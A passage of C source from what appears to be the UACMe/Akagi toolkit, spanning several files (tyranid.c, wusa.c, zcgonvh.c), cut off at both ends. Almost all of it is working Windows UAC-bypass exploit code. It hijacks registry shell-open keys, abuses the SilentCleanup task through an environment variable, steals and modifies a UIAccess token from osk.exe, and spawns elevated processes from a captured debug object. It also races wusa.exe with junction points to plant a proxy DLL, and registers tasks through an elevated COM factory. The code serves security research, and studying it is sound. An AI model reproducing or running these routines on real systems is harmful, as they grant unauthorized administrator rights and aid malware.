_strcpy(szKey, ABSOLUTEWIN);
_strcat(szKey, T_SHELL_OPEN);
_strcat(szKey, TEXT("\\"));
_strcat(szKey, T_SHELL_COMMAND);
if (ERROR_SUCCESS == RegCreateKeyEx(hClassesRoot, szKey, 0, NULL,
REG_OPTION_NON_VOLATILE,
MAXIMUM_ALLOWED,
NULL,
(HKEY*)&hSubKey,
NULL))
{
sz = (1 + _strlen(lpszPayload)) * sizeof(WCHAR);
MethodResult = supRegWriteValue(hSubKey,
NULL,
REG_SZ,
(PVOID)lpszPayload,
(DWORD)sz);
RegCloseKey(hSubKey);
}
if (!NT_SUCCESS(MethodResult))
break;
//
// Set CurVer to target key
//
hSubKey = NULL;
_strcpy(szKey, lpTargetKey);
_strcat(szKey, TEXT("\\"));
_strcat(szKey, T_CURVER);
if (ERROR_SUCCESS == RegCreateKeyEx(hClassesRoot, szKey, 0, NULL,
REG_OPTION_NON_VOLATILE,
MAXIMUM_ALLOWED,
NULL,
(HKEY*)&hSubKey,
NULL))
{
sz = (1 + _strlen(ABSOLUTEWIN)) * sizeof(WCHAR);
MethodResult = supRegWriteValue(hSubKey,
NULL,
REG_SZ,
(PVOID)ABSOLUTEWIN,
(DWORD)sz);
if (NT_SUCCESS(MethodResult)) {
if (supRunProcess(lpszTargetApp, NULL))
MethodResult = STATUS_SUCCESS;
}
RegCloseKey(hSubKey);
RegDeleteKey(hClassesRoot, szKey);
}
} while (FALSE);
supRegDeleteKeyRecursive(hClassesRoot, ABSOLUTEWIN);
if (hClassesRoot) NtClose(hClassesRoot);
#ifndef _WIN64
if (g_ctx->IsWow64) {
supEnableDisableWow64Redirection(FALSE);
}
#endif
return MethodResult;
}
================================================
FILE: Source/Akagi/methods/tyranid.c
================================================
/*******************************************************************************
*
* (C) COPYRIGHT AUTHORS, 2017 - 2025
*
* TITLE: TYRANID.C
*
* VERSION: 3.69
*
* DATE: 07 Jul 2025
*
* James Forshaw autoelevation method(s)
* Fine Dinning Tool (c) CIA
*
* For description please visit original URL
* https://tyranidslair.blogspot.ru/2017/05/exploiting-environment-variables-in.html
* https://tyranidslair.blogspot.ru/2017/05/reading-your-way-around-uac-part-1.html
* https://tyranidslair.blogspot.ru/2017/05/reading-your-way-around-uac-part-2.html
* https://tyranidslair.blogspot.ru/2017/05/reading-your-way-around-uac-part-3.html
* https://tyranidslair.blogspot.com/2019/02/accessing-access-tokens-for-uiaccess.html
* https://googleprojectzero.blogspot.com/2019/12/calling-local-windows-rpc-servers-from.html
*
* THIS CODE AND INFORMATION IS PROVIDED "AS IS" WITHOUT WARRANTY OF
* ANY KIND, EITHER EXPRESSED OR IMPLIED, INCLUDING BUT NOT LIMITED
* TO THE IMPLIED WARRANTIES OF MERCHANTABILITY AND/OR FITNESS FOR A
* PARTICULAR PURPOSE.
*
*******************************************************************************/
#include "global.h"
/*
* ucmDiskCleanupEnvironmentVariable
*
* Purpose:
*
* DiskCleanup task uses current user environment variables to build a path to the executable.
* Warning: this method works with AlwaysNotify UAC level.
*
*/
NTSTATUS ucmDiskCleanupEnvironmentVariable(
_In_ LPWSTR lpszPayload
)
{
NTSTATUS MethodResult = STATUS_ACCESS_DENIED;
WCHAR szEnvVariable[MAX_PATH * 2];
PWCHAR psz;
BOOL quoteFix;
do {
if (_strlen(lpszPayload) > MAX_PATH)
return STATUS_INVALID_PARAMETER;
RtlSecureZeroMemory(szEnvVariable, sizeof(szEnvVariable));
quoteFix = (g_ctx->dwBuildNumber >= NT_WIN10_21H2);
//
// Add quotes.
//
szEnvVariable[0] = L'\"';
psz = &szEnvVariable[!!quoteFix];
_strncpy(&szEnvVariable[1], MAX_PATH, lpszPayload, MAX_PATH);
_strcat(szEnvVariable, L"\"");
//
// Set our controlled env.variable with payload.
//
if (!supSetEnvVariableEx(FALSE, NULL, T_WINDIR, psz))
break;
//
// Run trigger task.
//
if (supStartScheduledTask(L"\\Microsoft\\Windows\\DiskCleanup", L"SilentCleanup"))
MethodResult = STATUS_SUCCESS;
//
// Cleaup our env.variable.
//
supSetEnvVariableEx(TRUE, NULL, T_WINDIR, NULL);
} while (FALSE);
return MethodResult;
}
/*
* ucmxTokenModUIAccessMethodInitPhase
*
* Purpose:
*
* Convert dll to new entrypoint/exe.
*
*/
BOOL ucmxTokenModUIAccessMethodInitPhase(
_In_ PVOID ProxyDll,
_In_ DWORD ProxyDllSize,
_In_ LPCSTR EntryPointName,
_In_ LPCWSTR PayloadFileName
)
{
BOOL bResult = FALSE;
WCHAR szBuffer[MAX_PATH * 2];
//
// Patch Fubuki to the new entry point and convert to EXE
//
if (supReplaceDllEntryPoint(ProxyDll,
ProxyDllSize,
EntryPointName,
TRUE))
{
//
// Drop modified Fubuki to the %temp%
//
RtlSecureZeroMemory(szBuffer, sizeof(szBuffer));
_strcpy(szBuffer, g_ctx->szTempDirectory);
_strcat(szBuffer, PayloadFileName);
bResult = supWriteBufferToFile(szBuffer, ProxyDll, ProxyDllSize);
}
return bResult;
}
/*
* ucmxTokenModUIAccessExec
*
* Purpose:
*
* Obtain token from UIAccess application, modify it and reuse for UAC bypass.
*
*/
NTSTATUS ucmxTokenModUIAccessExec(
_In_ PVOID ProxyDll,
_In_ DWORD ProxyDllSize,
_In_ LPCSTR EntryPointName,
_In_ LPCWSTR PayloadFileName,
_In_ UCM_METHOD Method
)
{
NTSTATUS Status = STATUS_ACCESS_DENIED;
LPWSTR lpszPayload = NULL;
PSID pIntegritySid = NULL;
HANDLE hDupToken = NULL, hProcessToken = NULL;
SHELLEXECUTEINFO shinfo;
SID_IDENTIFIER_AUTHORITY MLAuthority = SECURITY_MANDATORY_LABEL_AUTHORITY;
TOKEN_MANDATORY_LABEL tml;
SECURITY_QUALITY_OF_SERVICE sqos;
OBJECT_ATTRIBUTES obja;
WCHAR szBuffer[MAX_PATH * 2];
STARTUPINFO si;
PROCESS_INFORMATION pi;
RtlSecureZeroMemory(&shinfo, sizeof(shinfo));
do {
//
// Tweak and drop payload to %temp%.
//
if (!ucmxTokenModUIAccessMethodInitPhase(ProxyDll,
ProxyDllSize,
EntryPointName,
PayloadFileName))
{
break;
}
//
// Spawn OSK.exe process.
//
_strcpy(szBuffer, g_ctx->szSystemDirectory);
_strcat(szBuffer, OSK_EXE);
shinfo.cbSize = sizeof(shinfo);
shinfo.fMask = SEE_MASK_NOCLOSEPROCESS;
shinfo.lpFile = szBuffer;
shinfo.nShow = SW_HIDE;
if (!ShellExecuteEx(&shinfo))
break;
//
// Open process token.
//
Status = NtOpenProcessToken(shinfo.hProcess, TOKEN_DUPLICATE | TOKEN_QUERY, &hProcessToken);
if (!NT_SUCCESS(Status))
break;
//
// Duplicate primary token.
//
sqos.Length = sizeof(SECURITY_QUALITY_OF_SERVICE);
sqos.ImpersonationLevel = SecurityImpersonation;
sqos.ContextTrackingMode = 0;
sqos.EffectiveOnly = FALSE;
InitializeObjectAttributes(&obja, NULL, 0, NULL, NULL);
obja.SecurityQualityOfService = &sqos;
Status = NtDuplicateToken(hProcessToken, TOKEN_ALL_ACCESS, &obja, FALSE, TokenPrimary, &hDupToken);
if (!NT_SUCCESS(Status))
break;
NtClose(hProcessToken);
hProcessToken = NULL;
NtTerminateProcess(shinfo.hProcess, STATUS_SUCCESS);
NtClose(shinfo.hProcess);
shinfo.hProcess = NULL;
//
// Lower duplicated token IL from Medium+ to Medium.
//
Status = RtlAllocateAndInitializeSid(&MLAuthority,
1, SECURITY_MANDATORY_MEDIUM_RID,
0, 0, 0, 0, 0, 0, 0,
&pIntegritySid);
if (!NT_SUCCESS(Status))
break;
tml.Label.Attributes = SE_GROUP_INTEGRITY;
tml.Label.Sid = pIntegritySid;
Status = NtSetInformationToken(hDupToken, TokenIntegrityLevel, &tml,
(ULONG)(sizeof(TOKEN_MANDATORY_LABEL) + RtlLengthSid(pIntegritySid)));
if (!NT_SUCCESS(Status))
break;
RtlSecureZeroMemory(&pi, sizeof(PROCESS_INFORMATION));
RtlSecureZeroMemory(&si, sizeof(STARTUPINFO));
si.cb = sizeof(STARTUPINFO);
GetStartupInfo(&si);
//
// Run second stage exe to perform some gui hacks.
//
_strcpy(szBuffer, g_ctx->szTempDirectory);
_strcat(szBuffer, PKGMGR_EXE);
if (Method == UacMethodTokenModUiAccess) {
if (g_ctx->OptionalParameterLength == 0)
lpszPayload = g_ctx->szDefaultPayload;
else
lpszPayload = g_ctx->szOptionalParameter;
}
if (CreateProcessAsUser(hDupToken,
szBuffer, //application
lpszPayload, //command line
NULL,
NULL,
FALSE,
CREATE_DEFAULT_ERROR_MODE | NORMAL_PRIORITY_CLASS,
NULL,
NULL,
&si,
&pi))
{
if (WaitForSingleObject(pi.hProcess, 10000) == WAIT_TIMEOUT)
TerminateProcess(pi.hProcess, (UINT)-1);
CloseHandle(pi.hThread);
CloseHandle(pi.hProcess);
Status = STATUS_SUCCESS;
}
} while (FALSE);
if (hProcessToken) NtClose(hProcessToken);
if (shinfo.hProcess) {
NtTerminateProcess(shinfo.hProcess, STATUS_SUCCESS);
NtClose(shinfo.hProcess);
}
if (hDupToken) NtClose(hDupToken);
if (pIntegritySid) RtlFreeSid(pIntegritySid);
_strcpy(szBuffer, g_ctx->szTempDirectory);
_strcat(szBuffer, PayloadFileName);
DeleteFile(szBuffer);
return Status;
}
/*
* ucmTokenModUIAccessMethod
*
* Purpose:
*
* Obtain token from UIAccess application, modify it and reuse for UAC bypass.
*
*/
NTSTATUS ucmTokenModUIAccessMethod(
_In_ PVOID ProxyDll,
_In_ DWORD ProxyDllSize
)
{
return ucmxTokenModUIAccessExec(ProxyDll, ProxyDllSize,
FUBUKI_ENTRYPOINT_UIACCESS2, PKGMGR_EXE,
UacMethodTokenModUiAccess);
}
/*
* ucmTokenModUIAccessMethod2
*
* Purpose:
*
* Variant inspired by Stefan Kanthak findings. Based on same tyranid UIAccess bypass.
*
*/
NTSTATUS ucmTokenModUIAccessMethod2(
_In_ PVOID ProxyDll,
_In_ DWORD ProxyDllSize
)
{
HKEY hKey;
LRESULT lResult;
NTSTATUS Status = STATUS_ACCESS_DENIED;
SIZE_T sz;
WCHAR szPayload[MAX_PATH * 2];
_strcpy(szPayload, g_ctx->szTempDirectory);
_strcat(szPayload, THEOLDNEWTHING);
_strcat(szPayload, TEXT(".dll"));
if (supWriteBufferToFile(szPayload, ProxyDll, ProxyDllSize)) {
hKey = NULL;
lResult = RegCreateKeyEx(HKEY_CURRENT_USER, T_HTMLHELP_AUTHOR, 0, NULL,
REG_OPTION_NON_VOLATILE, KEY_ALL_ACCESS, NULL, &hKey, NULL);
if (lResult == ERROR_SUCCESS) {
sz = (1 + _strlen(szPayload)) * sizeof(WCHAR);
lResult = RegSetValueEx(hKey,
T_LOCATION,
0,
REG_SZ,
(BYTE*)szPayload,
(DWORD)sz);
if (lResult == ERROR_SUCCESS) {
Status = ucmxTokenModUIAccessExec(ProxyDll,
ProxyDllSize,
FUBUKI_ENTRYPOINT_UIACCESS3,
PKGMGR_EXE,
UacMethodTokenModUiAccess2);
}
RegCloseKey(hKey);
}
RegDeleteKey(HKEY_CURRENT_USER, T_HTMLHELP_AUTHOR);
DeleteFile(szPayload);
}
return Status;
}
/*
* ucmxCreateProcessFromParent
*
* Purpose:
*
* Create new process using parent process handle.
*
*/
NTSTATUS ucmxCreateProcessFromParent(
_In_ HANDLE ParentProcess,
_In_ LPWSTR Payload)
{
NTSTATUS status = STATUS_UNSUCCESSFUL;
SIZE_T size = 0x30;
STARTUPINFOEX si;
PROCESS_INFORMATION pi;
RtlSecureZeroMemory(&pi, sizeof(pi));
RtlSecureZeroMemory(&si, sizeof(si));
si.StartupInfo.cb = sizeof(STARTUPINFOEX);
do {
if (size > 1024)
break;
si.lpAttributeList = supHeapAlloc(size);
if (si.lpAttributeList) {
if (InitializeProcThreadAttributeList(si.lpAttributeList, 1, 0, &size)) {
if (UpdateProcThreadAttribute(si.lpAttributeList, 0,
PROC_THREAD_ATTRIBUTE_PARENT_PROCESS, &ParentProcess, sizeof(HANDLE), 0, 0)) //-V616
{
si.StartupInfo.dwFlags = STARTF_USESHOWWINDOW;
si.StartupInfo.wShowWindow = SW_SHOW;
if (CreateProcess(NULL,
Payload,
NULL,
NULL,
FALSE,
CREATE_UNICODE_ENVIRONMENT | EXTENDED_STARTUPINFO_PRESENT,
NULL,
g_ctx->szSystemRoot,
(LPSTARTUPINFO)&si,
&pi))
{
CloseHandle(pi.hThread);
CloseHandle(pi.hProcess);
status = STATUS_SUCCESS;
}
}
}
if (si.lpAttributeList)
DeleteProcThreadAttributeList(si.lpAttributeList); //dumb empty routine
supHeapFree(si.lpAttributeList);
}
} while (GetLastError() == ERROR_INSUFFICIENT_BUFFER);
return status;
}
/*
* ucmDebugObjectMethod
*
* Purpose:
*
* Bypass UAC by direct RPC call to APPINFO and DebugObject use.
*
*/
NTSTATUS ucmDebugObjectMethod(
_In_ LPWSTR lpszPayload
)
{
//UINT retryCount = 0;
BOOL debugObjectSet = FALSE;
NTSTATUS status = STATUS_ACCESS_DENIED;
HANDLE dbgHandle = NULL, dbgProcessHandle = NULL, dupHandle = NULL;
PROCESS_INFORMATION procInfo;
DEBUG_EVENT dbgEvent;
WCHAR szProcess[MAX_PATH * 2];
do {
//
// Spawn initial non elevated victim process under debug.
//
//do { /* remove comment for attempt to spam debug object within thread pool */
_strcpy(szProcess, g_ctx->szSystemDirectory);
_strcat(szProcess, WINVER_EXE);
if (!AicLaunchAdminProcess(szProcess,
szProcess,
0,
CREATE_UNICODE_ENVIRONMENT | DEBUG_PROCESS,
g_ctx->szSystemRoot,
T_DEFAULT_DESKTOP,
NULL,
INFINITE,
SW_HIDE,
&procInfo))
{
status = STATUS_UNSUCCESSFUL;
break;
}
//
// Capture debug object handle.
//
status = supGetProcessDebugObject(procInfo.hProcess,
&dbgHandle);
if (!NT_SUCCESS(status)) {
TerminateProcess(procInfo.hProcess, 0);
CloseHandle(procInfo.hThread);
CloseHandle(procInfo.hProcess);
procInfo.hThread = NULL;
procInfo.hProcess = NULL;
break;
}
//
// Detach debug and kill non elevated victim process.
//
NtRemoveProcessDebug(procInfo.hProcess, dbgHandle);
TerminateProcess(procInfo.hProcess, 0);
CloseHandle(procInfo.hThread);
CloseHandle(procInfo.hProcess);
//} while (++retryCount < 20);
//
// Spawn elevated victim under debug.
//
_strcpy(szProcess, g_ctx->szSystemDirectory);
_strcat(szProcess, COMPUTERDEFAULTS_EXE);
RtlSecureZeroMemory(&procInfo, sizeof(procInfo));
RtlSecureZeroMemory(&dbgEvent, sizeof(dbgEvent));
if (!AicLaunchAdminProcess(szProcess,
szProcess,
1,
CREATE_UNICODE_ENVIRONMENT | DEBUG_PROCESS,
g_ctx->szSystemRoot,
T_DEFAULT_DESKTOP,
NULL,
INFINITE,
SW_HIDE,
&procInfo))
{
status = STATUS_UNSUCCESSFUL;
break;
}
//
// Update thread TEB with debug object handle to receive debug events.
//
DbgUiSetThreadDebugObject(dbgHandle);
debugObjectSet = TRUE;
//
// Debugger wait cycle.
//
while (1) {
if (!WaitForDebugEvent(&dbgEvent, INFINITE))
break;
switch (dbgEvent.dwDebugEventCode) {
//
// Capture initial debug event process handle.
//
case CREATE_PROCESS_DEBUG_EVENT:
dbgProcessHandle = dbgEvent.u.CreateProcessInfo.hProcess;
break;
}
if (dbgProcessHandle)
break;
ContinueDebugEvent(dbgEvent.dwProcessId, dbgEvent.dwThreadId, DBG_CONTINUE);
}
if (dbgProcessHandle) {
//
// Create new handle from captured with PROCESS_ALL_ACCESS.
//
status = NtDuplicateObject(dbgProcessHandle,
NtCurrentProcess(),
NtCurrentProcess(),
&dupHandle,
PROCESS_ALL_ACCESS,
0,
0);
if (NT_SUCCESS(status)) {
//
// Run new process with parent set to duplicated process handle.
//
ucmxCreateProcessFromParent(dupHandle, lpszPayload);
NtClose(dupHandle);
dupHandle = NULL;
}
}
} while (FALSE);
//
// Cleanup section.
//
if (debugObjectSet) {
#pragma warning(push)
#pragma warning(disable: 6387)
DbgUiSetThreadDebugObject(NULL);
#pragma warning(pop)
}
if (dbgHandle) {
NtClose(dbgHandle);
}
if (dbgProcessHandle) {
CloseHandle(dbgProcessHandle);
}
// Release victim process if still open
if (procInfo.hThread) {
CloseHandle(procInfo.hThread);
}
if (procInfo.hProcess) {
TerminateProcess(procInfo.hProcess, 0);
CloseHandle(procInfo.hProcess);
}
supSetGlobalCompletionEvent();
return status;
}
================================================
FILE: Source/Akagi/methods/wusa.c
================================================
/*******************************************************************************
*
* (C) COPYRIGHT AUTHORS, 2017 - 2025
*
* TITLE: WUSA.C
*
* VERSION: 3.69
*
* DATE: 07 Jul 2025
*
* Windows Update Standalone Installer (WUSA) based routines.
*
* THIS CODE AND INFORMATION IS PROVIDED "AS IS" WITHOUT WARRANTY OF
* ANY KIND, EITHER EXPRESSED OR IMPLIED, INCLUDING BUT NOT LIMITED
* TO THE IMPLIED WARRANTIES OF MERCHANTABILITY AND/OR FITNESS FOR A
* PARTICULAR PURPOSE.
*
*******************************************************************************/
#include "global.h"
#include "makecab.h"
/*
* ucmCreateCabinetForSingleFile
*
* Purpose:
*
* Build cabinet for usage in methods where required 1 file.
*
*/
BOOL ucmCreateCabinetForSingleFile(
_In_ LPWSTR lpSourceDll,
_In_ PVOID ProxyDll,
_In_ DWORD ProxyDllSize,
_In_opt_ LPWSTR lpInternalName
)
{
BOOL bResult = FALSE;
CABDATA *Cabinet = NULL;
LPWSTR lpFileName;
WCHAR szMsuFileName[MAX_PATH * 2];
if ((ProxyDll == NULL) ||
(ProxyDllSize == 0) ||
(lpSourceDll == NULL)) return bResult;
do {
//drop proxy dll
if (!supWriteBufferToFile(lpSourceDll, ProxyDll, ProxyDllSize)) {
break;
}
//build cabinet
RtlSecureZeroMemory(szMsuFileName, sizeof(szMsuFileName));
_strcpy(szMsuFileName, g_ctx->szTempDirectory);
_strcat(szMsuFileName, ELLOCNAK_MSU);
Cabinet = cabCreate(szMsuFileName);
if (Cabinet == NULL)
break;
if (lpInternalName == NULL) {
lpFileName = _filename(lpSourceDll);
}
else {
lpFileName = lpInternalName;
}
//put file without compression
bResult = cabAddFile(Cabinet, lpSourceDll, lpFileName);
cabClose(Cabinet);
} while (FALSE);
DeleteFile(lpSourceDll);
return bResult;
}
/*
* ucmWusaCabinetCleanup
*
* Purpose:
*
* Remove fake msu file.
*
*/
VOID ucmWusaCabinetCleanup(
VOID)
{
WCHAR szMsuFileName[MAX_PATH * 2];
RtlSecureZeroMemory(szMsuFileName, sizeof(szMsuFileName));
_strcpy(szMsuFileName, g_ctx->szTempDirectory);
_strcat(szMsuFileName, ELLOCNAK_MSU);
DeleteFile(szMsuFileName);
}
volatile ULONG g_ThreadFinished = 0;
/*
* ucmxInvokeWusaThread
*
* Purpose:
*
* Start wusa and wait a bit.
*
*/
DWORD ucmxInvokeWusaThread(
PVOID Param)
{
SHELLEXECUTEINFO shinfo;
WCHAR szProcess[MAX_PATH * 2];
WCHAR szParameters[MAX_PATH * 3];
UNREFERENCED_PARAMETER(Param);
InterlockedExchange((LONG*)&g_ThreadFinished, 0);
RtlSecureZeroMemory(&shinfo, sizeof(shinfo));
_strcpy(szProcess, g_ctx->szSystemDirectory);
_strcat(szProcess, WUSA_EXE);
RtlSecureZeroMemory(szParameters, sizeof(szParameters));
_strcpy(szParameters, TEXT(" /quiet "));
_strcat(szParameters, g_ctx->szTempDirectory);
_strcat(szParameters, ELLOCNAK_MSU);
shinfo.cbSize = sizeof(shinfo);
shinfo.fMask = SEE_MASK_NOCLOSEPROCESS | SEE_MASK_FLAG_NO_UI;
shinfo.lpFile = szProcess;
shinfo.lpParameters = szParameters;
shinfo.nShow = SW_HIDE;
if (ShellExecuteEx(&shinfo)) {
if (WaitForSingleObject(shinfo.hProcess, 1000) == WAIT_TIMEOUT)
TerminateProcess(shinfo.hProcess, 0);
CloseHandle(shinfo.hProcess);
}
Sleep(2000);
InterlockedExchange((LONG*)&g_ThreadFinished, 1);
return 0;
}
/*
* ucmxDirectoryWatchdogThread
*
* Purpose:
*
* Monitor directory creation in system root directory.
* When it happened - set reparse point.
*
*/
DWORD ucmxDirectoryWatchdogThread(
PVOID Param)
{
BOOL bResult = FALSE;
NTSTATUS status;
HANDLE hDirectory = NULL, hReparseDirectory = NULL, hEvent = NULL;
IO_STATUS_BLOCK IoStatusBlock;
OBJECT_ATTRIBUTES ObjectAttributes;
LPWSTR lpTargetDirectory = (LPWSTR)Param;
PVOID Buffer = NULL;
SIZE_T memIO = 0;
FILE_NOTIFY_INFORMATION *pInfo = NULL;
LPWSTR CapturedDirectoryName = NULL, lpEnd = NULL;
WCHAR szBuffer[MAX_PATH * 2];
UNICODE_STRING usTargetDirectory, usWatchDirectory, usReparseDirectory;
do {
//
// Convert target directory path to native form.
//
usTargetDirectory.Buffer = NULL;
if (!RtlDosPathNameToNtPathName_U(lpTargetDirectory, &usTargetDirectory, NULL, NULL))
break;
//
// Convert watch directory path to native form.
//
RtlSecureZeroMemory(szBuffer, sizeof(szBuffer));
szBuffer[0] = L'\\';
szBuffer[1] = L'?';
szBuffer[2] = L'?';
szBuffer[3] = L'\\';
_strncpy(&szBuffer[4], MAX_PATH, g_ctx->szSystemDirectory, 3);
//
// Open directory for change notification.
//
RtlInitUnicodeString(&usWatchDirectory, szBuffer);
InitializeObjectAttributes(&ObjectAttributes, &usWatchDirectory, OBJ_CASE_INSENSITIVE, 0, NULL);
status = NtCreateFile(&hDirectory,
FILE_LIST_DIRECTORY | SYNCHRONIZE,
&ObjectAttributes,
&IoStatusBlock,
NULL,
FILE_OPEN_FOR_BACKUP_INTENT,
FILE_SHARE_READ | FILE_SHARE_WRITE | FILE_SHARE_DELETE,
FILE_OPEN,
FILE_DIRECTORY_FILE | FILE_SYNCHRONOUS_IO_NONALERT,
NULL,
0);
if (!NT_SUCCESS(status))
break;
memIO = 1024 * 1024;
Buffer = supHeapAlloc(memIO);
if (Buffer == NULL)
break;
InitializeObjectAttributes(&ObjectAttributes, NULL, 0, 0, NULL);
status = NtCreateEvent(&hEvent, EVENT_ALL_ACCESS, &ObjectAttributes, NotificationEvent, FALSE);
if (!NT_SUCCESS(status))
break;
//
// Watch for directory changes.
//
do {
status = NtNotifyChangeDirectoryFile(hDirectory, hEvent, NULL, NULL,
&IoStatusBlock, Buffer, (ULONG)memIO, FILE_NOTIFY_CHANGE_DIR_NAME, TRUE);
if (status == STATUS_PENDING)
NtWaitForSingleObject(hEvent, TRUE, NULL);
NtSetEvent(hEvent, NULL);
pInfo = (FILE_NOTIFY_INFORMATION*)Buffer;
for (;;) {
if (pInfo->Action == FILE_ACTION_ADDED) {
memIO = pInfo->FileNameLength +
((1 + _strlen(szBuffer)) * sizeof(WCHAR));
CapturedDirectoryName = (LPWSTR)supHeapAlloc(memIO);
if (CapturedDirectoryName) {
_strcpy(CapturedDirectoryName, szBuffer);
lpEnd = _strend(CapturedDirectoryName);
RtlCopyMemory(lpEnd, pInfo->FileName, pInfo->FileNameLength);
//
// Open new directory to set reparse point.
//
RtlInitUnicodeString(&usReparseDirectory, CapturedDirectoryName);
InitializeObjectAttributes(&ObjectAttributes, &usReparseDirectory, OBJ_CASE_INSENSITIVE, NULL, NULL);
status = NtCreateFile(&hReparseDirectory,
FILE_ALL_ACCESS,
&ObjectAttributes,
&IoStatusBlock,
NULL,
0,
FILE_SHARE_READ | FILE_SHARE_WRITE,
FILE_OPEN,
FILE_OPEN_REPARSE_POINT | FILE_SYNCHRONOUS_IO_NONALERT,
NULL,
0);
if (NT_SUCCESS(status)) {
//
// Set reparse point.
//
bResult = supSetMountPoint(hReparseDirectory,
usTargetDirectory.Buffer,
lpTargetDirectory);
}
status = STATUS_NO_SECRETS;
}
} //Action
if (status == STATUS_NO_SECRETS)
break;
pInfo = (FILE_NOTIFY_INFORMATION*)(((LPBYTE)pInfo) + pInfo->NextEntryOffset);
if (pInfo->NextEntryOffset == 0)
break;
}
} while (NT_SUCCESS(status));
} while (FALSE);
//
// Cleanup.
//
if (hEvent)
NtClose(hEvent);
if (hDirectory != NULL)
NtClose(hDirectory);
if (usTargetDirectory.Buffer)
RtlFreeUnicodeString(&usTargetDirectory);
if (Buffer != NULL)
supHeapFree(Buffer);
//
// Remove reparse point.
//
if (CapturedDirectoryName) {
while (g_ThreadFinished != 1)
Sleep(100);
if (hReparseDirectory) {
supDeleteMountPoint(hReparseDirectory);
NtClose(hReparseDirectory);
}
RtlInitUnicodeString(&usReparseDirectory, CapturedDirectoryName);
InitializeObjectAttributes(&ObjectAttributes, &usReparseDirectory, OBJ_CASE_INSENSITIVE, NULL, NULL);
NtDeleteFile(&ObjectAttributes);
supHeapFree(CapturedDirectoryName);
}
return (DWORD)bResult;
}
/*
* ucmWusaExtractViaJunction
*
* Purpose:
*
* Extract cab contents to the specified directory by initializing wusa race condition.
* This routine expect source as ellocnak.msu cab file in the %temp% folder.
*
*/
BOOL ucmWusaExtractViaJunction(
_In_ LPWSTR lpTargetDirectory
)
{
HANDLE hWatchdogThread, hWusaThread;
DWORD ti;
do {
//
// Run watchdog thread.
//
hWatchdogThread = CreateThread(NULL, 0, (LPTHREAD_START_ROUTINE)ucmxDirectoryWatchdogThread, lpTargetDirectory, 0, &ti);
if (hWatchdogThread == NULL)
break;
//
// Run wusa in separate thread.
//
hWusaThread = CreateThread(NULL, 0, (LPTHREAD_START_ROUTINE)ucmxInvokeWusaThread, NULL, 0, &ti);
if (hWusaThread) {
if (WaitForSingleObject(hWusaThread, 15000) == WAIT_TIMEOUT)
TerminateThread(hWusaThread, 0);
CloseHandle(hWusaThread);
}
if (WaitForSingleObject(hWatchdogThread, 10000) == WAIT_TIMEOUT)
TerminateThread(hWatchdogThread, 0);
CloseHandle(hWatchdogThread);
} while (FALSE);
return (g_ThreadFinished == 1);
}
================================================
FILE: Source/Akagi/methods/zcgonvh.c
================================================
/*******************************************************************************
*
* (C) COPYRIGHT AUTHORS, 2020 - 2025
*
* TITLE: ZCGONVH.C
*
* VERSION: 3.69
*
* DATE: 12 Dec 2025
*
* UAC bypass methods based on zcgonvh original work.
*
* THIS CODE AND INFORMATION IS PROVIDED "AS IS" WITHOUT WARRANTY OF
* ANY KIND, EITHER EXPRESSED OR IMPLIED, INCLUDING BUT NOT LIMITED
* TO THE IMPLIED WARRANTIES OF MERCHANTABILITY AND/OR FITNESS FOR A
* PARTICULAR PURPOSE.
*
*******************************************************************************/
#include "global.h"
#include "encresource.h"
HRESULT ucmxGetElevatedFactoryServerObject(
_In_ LPCWSTR Clsid,
_Out_ VOID** FactoryServer
)
{
HRESULT r;
IElevatedFactoryServer* pElevatedServer = NULL;
*FactoryServer = NULL;
r = ucmAllocateElevatedObject(Clsid,
&IID_ElevatedFactoryServer,
CLSCTX_LOCAL_SERVER,
(VOID**)&pElevatedServer);
if (FAILED(r))
return r;
if (pElevatedServer == NULL) {
return E_OUTOFMEMORY;
}
*FactoryServer = pElevatedServer;
return S_OK;
}
BOOL ucmxGetElevatedFactoryServerAndTaskService(
_Out_ IElevatedFactoryServer** FactoryServer,
_Out_ ITaskService** TaskService
)
{
IElevatedFactoryServer* pElevatedServer = NULL;
ITaskService* pService = NULL;
HRESULT r;
*TaskService = NULL;
*FactoryServer = NULL;
do {
r = ucmxGetElevatedFactoryServerObject(T_CLSID_VFServer,
(VOID**)&pElevatedServer);
if (r != S_OK)
break;
if (pElevatedServer == NULL) {
r = E_OUTOFMEMORY;
break;
}
r = pElevatedServer->lpVtbl->ServerCreateElevatedObject(pElevatedServer,
&CLSID_TaskScheduler,
&IID_ITaskService,
(void**)&pService);
if (r != S_OK) {
break;
}
if (pService == NULL) {
r = E_OUTOFMEMORY;
break;
}
*FactoryServer = pElevatedServer;
*TaskService = pService;
} while (FALSE);
if (FAILED(r)) {
if (pElevatedServer) {
pElevatedServer->lpVtbl->Release(pElevatedServer);
pElevatedServer = NULL;
}
}
return SUCCEEDED(r);
}
BOOL ucmxRegisterAndRunTask(
_In_ ITaskService* TaskService,
_In_ BSTR RegistrationData
)
{
HRESULT r = E_FAIL;
VARIANT varDummy;
ITaskFolder* pTaskFolder = NULL;
IRegisteredTask* pTask = NULL;
IRunningTask* pRunningTask = NULL;
TASK_STATE taskState = TASK_STATE_UNKNOWN;
BSTR bstrTaskFolder = NULL, bstrTaskName = NULL;
do {
bstrTaskFolder = SysAllocString(L"\\");
if (bstrTaskFolder == NULL)
break;
bstrTaskName = SysAllocString(THEOLDNEWTHING);
if (bstrTaskName == NULL)
break;
VariantInit(&varDummy);
r = TaskService->lpVtbl->Connect(TaskService,
varDummy,
varDummy,
varDummy,
varDummy);
if (FAILED(r))
break;
r = TaskService->lpVtbl->GetFolder(TaskService, bstrTaskFolder, &pTaskFolder);
if (r != S_OK || pTaskFolder == NULL)
break;
r = pTaskFolder->lpVtbl->RegisterTask(pTaskFolder, bstrTaskName, RegistrationData, 0,
varDummy, varDummy, TASK_LOGON_INTERACTIVE_TOKEN, varDummy, &pTask);
if (r == HRESULT_FROM_WIN32(ERROR_ALREADY_EXISTS)) {
r = pTaskFolder->lpVtbl->GetTask(pTaskFolder, bstrTaskName, &pTask);
if (SUCCEEDED(r)) {
pTask->lpVtbl->Stop(pTask, 0);
pTask->lpVtbl->Release(pTask);
pTaskFolder->lpVtbl->DeleteTask(pTaskFolder, bstrTaskName, 0);
}
r = pTaskFolder->lpVtbl->RegisterTask(pTaskFolder, bstrTaskName, RegistrationData, 0,
varDummy, varDummy, TASK_LOGON_INTERACTIVE_TOKEN, varDummy, &pTask);
}
if (r != S_OK || pTask == NULL)
break;
r = pTask->lpVtbl->Run(pTask, varDummy, &pRunningTask);
if (r != S_OK || pRunningTask == NULL)
break;
